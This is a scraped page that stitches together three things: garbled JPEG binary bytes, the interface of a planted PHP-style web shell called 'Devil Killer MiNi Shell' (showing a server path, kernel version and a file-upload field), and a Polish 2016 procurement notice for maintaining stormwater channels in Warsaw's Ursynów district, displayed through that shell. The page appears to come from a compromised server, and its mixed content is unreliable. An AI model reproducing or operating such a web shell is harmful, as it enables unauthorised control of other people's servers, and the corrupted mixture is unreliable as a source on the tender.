JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160922/311706-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 311706 - 2016
              z dnia 2016-09-22 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Stołeczne Warszawa Dzielnica Ursynów, krajowy numer identyfikacyjny
              1525964000000, ul.
              al. Komisji Edukacji Narodowej 
              61,
              02777  
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              22 443 71 01, e-mail
              zam_publ@ursynow.pl, faks
              22 443 71 02.
              <br />
              Adres strony internetowej (URL): www.ursynow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.ursynow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.ursynow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta winna być sporządzona, pod rygorem nieważności, w formie pisemnej (ręcznie, na maszynie do pisania lub w postaci wydruku komputerowego), pismem czytelnym<br />
                Adres:
                <br />Ofertę należy przesłać lub złożyć w siedzibie Zamawiającego przy Al. KEN 61 w  Wydziale Obsługi Mieszkańców na parterze, stanowiska 2 lub 3</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy<br /><b>Numer referencyjny: </b>KZP-XII-WZP.271.59.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />6<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest konserwacja urządzeń wodnych stanowiących własność Skarbu Państwa, będących odbiornikami wód opadowych i roztopowych pochodzących z obszarów miejskich na terenie Dzielnicy Ursynów m.st. Warszawy.
Zamawiający w przedmiotowym zamówieniu przewidział 6 niżej wymienionych Części:
- Część 1: Kanał Bokserski;
- Część 2: Kanał Imieliński;
- Część 3: Kolektor B-2;
- Część 4: Kanał Grabowski;
- Część 5: Kanał Jeziorki;
- Część 6: Kolektor B-4.<br /><br /><b>II.5) Główny kod CPV: </b>90470000-2<br /><b> Dodatkowe kody CPV:</b>34930000-5,
                77314100-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              219734.37<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 13/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania zamówienia: 
Część 1-6: od dnia 24.10.2016 r. do dnia 13.11.2016 r., z zastrzeżeniem § 2 ust. 2 wzoru umowy odpowiednio dla Części 1-6.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców którzy wykażą, że:
1)	w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie) wykonali1 (tj. zakończyli) co najmniej jedną usługę polegającą m.in. na wykoszeniu rowu/rowów/kanału/kanałów otwartego/-tych: 

a)	DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA CZĘŚĆ 1:
	na długości nie mniejszej niż 0,3 km.

b)	DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA CZĘŚĆ 2:
	na długości nie mniejszej niż 0,2 km. 

c)	DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA CZĘŚĆ 3:
	na długości nie mniejszej niż 0,1 km. 

d)	DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA CZĘŚĆ 4:
	na długości nie mniejszej niż 2,0 km. 

e)	DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA CZĘŚĆ 5:
	na długości nie mniejszej niż 1,0 km. 
f)	DOTYCZY WYKONAWCÓW SKŁADAJĄCYCH OFERTĘ NA CZĘŚĆ 6:
	na długości nie mniejszej niż 1,0 km. 

 Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.

UWAGA! 
W sytuacji, gdy Wykonawca będzie składał ofertę na więcej niż jedną część dopuszczalne jest, aby wykazał się tą samą usługą w zakresie więcej niż jednej części, z zastrzeżeniem, iż usługa ta musi potwierdzać spełnianie warunku dla poszczególnych części. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	wykaz usług (zgodny z załącznikiem nr 5 do SIWZ) wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Oferta powinna składać się z:
a)	wypełnionego Formularza oferty - wg wzoru określonego w Załączniku nr 1 do SIWZ;
b)	aktualnego na dzień składania ofert oświadczenia Wykonawcy stanowiącego wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego, o treści zgodnej z określoną we wzorze stanowiącym Załącznik nr 3 do SIWZ;
c)	aktualnego na dzień składania ofert oświadczenia Wykonawcy, stanowiącego wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu odpowiednio w zakresie Części na jakie składa ofertę, o treści zgodnej z określoną we wzorze stanowiącym Załącznik  nr 4 do SIWZ;
d)	    dokumentu (np. pełnomocnictwa) - jeżeli oferta, w tym wszelkie oświadczenia i dokumenty - zostaną podpisane przez osobę albo osoby działające na podstawie pełnomocnictwa. Jeżeli osoba/osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi obejmować uprawnienie do podpisania oferty. Pełnomocnictwo musi zostać złożone wraz z ofertą w oryginale lub notarialnie poświadczonej kopii. Do pełnomocnictwa należy załączyć dokumenty potwierdzające, że osoba udzielająca pełnomocnictwa była upoważniona do reprezentowania Wykonawcy w dacie udzielania pełnomocnictwa (co można wykazać w szczególności przez załączenie odpisu z Krajowego Rejestru Sądowego lub informacji odpowiadającej odpisowi aktualnemu Rejestru Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z dnia 20 sierpnia 1997 r. o Krajowym Rejestrze Sądowym (Dz. U. z 2007 r. Nr 168, poz.1186, z pózn. zm.) albo zaświadczenia o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej zgodnie z art. 38 ust. 4 ustawy o swobodzie działalności gospodarczej z dnia 2 lipca 2004 r. (Dz.U. z 2015 r., poz. 584, z późn. zm.).
e)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ust. 1 ustawy, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia;
Dokument ten powinien w szczególności zawierać następujące informacje:
	zakres dostępnych wykonawcy zasobów innego podmiotu;
	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia publicznego;
	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.
Uwaga! 
Informację o podmiotach, na zdolnościach lub sytuacji których Wykonawca polega na zasadach określonych w art. 22a ust. 1 ustawy należy zawrzeć w oświadczeniach, o których mowa w sekcji III.7) 1. lit. b) i c) Ogłoszenia.
2.	Dokumenty dotyczące przynależności do tej samej grupy kapitałowej
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy  wg wzoru określonego w Załączniku nr 5 do SIWZ, odpowiednio dla Części, na którą złożył ofertę.
Wraz ze złożonym oświadczeniem, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.


3.	Dokumenty podmiotów zagranicznych
Wykonawca zagraniczny składa dokumenty zgodnie z zapisami sekcji III.1.3 oraz pkt. III.7.1 Ogłoszenia, ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z ofertą potwierdzały, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.

4.	Oferta wspólna:
Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.
2)	Oryginał pełnomocnictwa lub kopii potwierdzonej notarialnie powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy,
b)	wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,
c)	ustanowionego Pełnomocnika oraz zakresu jego umocowania.
3)	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.
4)	W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 2 ustawy wymagania te muszą być spełnione wspólnie przez Wykonawców (nie musi ich spełniać każdy z Wykonawców składających ofertę wspólną osobno).
5)	Oświadczenia, wykazy lub formularze sporządzone na załączonych do SIWZ wzorach, składa i podpisuje w imieniu wszystkich Wykonawców Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.
6)	Oświadczenia i dokumenty, o których mowa w sekcji III pkt. III.7.1 lit. b) oraz III.7.2 Ogłoszenia każdy z uczestników oferty wspólnej składa indywidualnie.
7)	Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą lub przez pełnomocnika.
8)	Pozostałe kopie dokumentów, inne niż wymienione w sekcji III pkt. III.7.4.7 Ogłoszenia, muszą być poświadczone za zgodność z oryginałem przez Pełnomocnika lub wszystkich Wykonawców.
9)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w formularzu oferty.

5.	Wykonawcy polegający na sytuacji lub zdolnościach innych podmiotów
Wykonawca, który polega na sytuacji lub zdolnościach innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, przedstawia, na wezwanie Zamawiającego, w odniesieniu do tych podmiotów, niżej wymienione dokumenty na potwierdzenie braku podstaw do wykluczenia tych podmiotów w oparciu o art. 24 ust. 1 pkt. 13-23 i ust. 5, tj:
1)	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że podmiot ten nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że podmiot ten zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że podmiot nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
5)	oświadczenie podmiotu o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
6)	oświadczenie podmiotu o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
7)	oświadczenie podmiotu o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy;
8)	oświadczenie podmiotu o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy;
9)	oświadczenie podmiotu o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
